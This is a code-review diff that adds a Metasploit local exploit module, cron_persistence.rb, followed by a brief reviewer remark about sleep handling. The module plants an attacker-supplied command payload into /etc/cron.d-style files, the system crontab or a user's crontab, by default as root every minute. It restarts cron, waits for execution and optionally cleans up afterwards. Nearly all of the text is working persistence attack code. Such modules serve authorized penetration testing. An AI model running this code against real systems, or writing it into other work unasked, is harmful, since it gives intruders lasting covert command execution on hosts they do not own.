modules/exploits/linux/local/cron_persistence.rb

```diff
@@ -0,0 +1,138 @@
+        'Arch'           => ARCH_CMD,
+        'Payload'        =>
+        {
+          'BadChars'   => "#%\x10\x13", # % always seems to fail, # is for comments
+          'Compat'     =>
+          {
+            'PayloadType'  => 'cmd',
+            'RequiredCmd'  => 'generic perl ruby python'
+          }
+        },
+        'DefaultOptions' => { 'WfsDelay' => 90 },
+        'DisclosureDate' => "Jul 1 1979" # Version 7 Unix release date (first cron implementation)
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('USERNAME', [false, 'User to run cron/crontab as', 'root']),
+        OptString.new('TIMING', [false, 'cron timing.  Changing will require WfsDelay to be adjusted', '* * * * *']),
+        OptBool.new('CLEANUP', [true, 'delete cron entry after execution', true])
+      ], self.class
+    )
+  end
+
+  def exploit
+    # https://gist.github.com/istvanp/310203 for cron regex validator
+    cron_regex = '(\*|[0-5]?[0-9]|\*\/[0-9]+)\s+'
+    cron_regex << '(\*|1?[0-9]|2[0-3]|\*\/[0-9]+)\s+'
+    cron_regex << '(\*|[1-2]?[0-9]|3[0-1]|\*\/[0-9]+)\s+'
+    cron_regex << '(\*|[0-9]|1[0-2]|\*\/[0-9]+|jan|feb|mar|apr|may|jun|jul|aug|sep|oct|nov|dec)\s+'
+    cron_regex << '(\*\/[0-9]+|\*|[0-7]|sun|mon|tue|wed|thu|fri|sat)' # \s*
+    # cron_regex << '(\*\/[0-9]+|\*|[0-9]+)?'
+    unless datastore['TIMING'] =~ %r{#{cron_regex}}
+      fail_with(Failure::BadConfig, 'Invalid timing format')
+    end
+    cron_entry = datastore['TIMING']
+    if target.name =~ /User Crontab/
+      unless user_cron_permission?(datastore['USERNAME'])
+        fail_with(Failure::NoAccess, 'User denied cron via cron.deny')
+      end
+    else
+      cron_entry += " #{datastore['USERNAME']}"
+    end
+    flag = Rex::Text.rand_text_alpha(10)
+    cron_entry += " #{payload.encoded} ##{flag}" # we add a flag to the end of the entry to potentially delete it later
+    case target.name
+    when 'Cron'
+      our_entry = Rex::Text.rand_text_alpha(10)
+      write_file(target.opts['path'] + "/#{our_entry}", "#{cron_entry}\n")
+      vprint_good("Writing #{cron_entry} to #{target.opts['path']}/#{our_entry}")
+      if datastore['CLEANUP']
+        register_file_for_cleanup("#{target.opts['path']}/#{our_entry}")
+      end
+    when 'System Crontab'
+      file_to_clean = "#{target.opts['path']}/crontab"
+      append_file(file_to_clean, "\n#{cron_entry}\n")
+      vprint_good("Writing #{cron_entry} to #{file_to_clean}")
+    when 'User Crontab'
+      file_to_clean = "#{target.opts['path']}/crontabs/#{datastore['USERNAME']}"
+      append_file(file_to_clean, "\n#{cron_entry}\n")
+      vprint_good("Writing #{cron_entry} to #{file_to_clean}")
+      # at least on ubuntu, we need to restart cron to get this to work
+      vprint_status('Reloading cron to pickup new entry')
+      cmd_exec("service cron restart")
+    end
+    print_status("Waiting #{datastore['WfsDelay']}sec for execution")
+    sleep(datastore['WfsDelay'].to_i)
```

Comment:
I would use ```Rex.sleep``` here, but it's just a wrapper around ```select```, and any bugs have now passed. Up to you.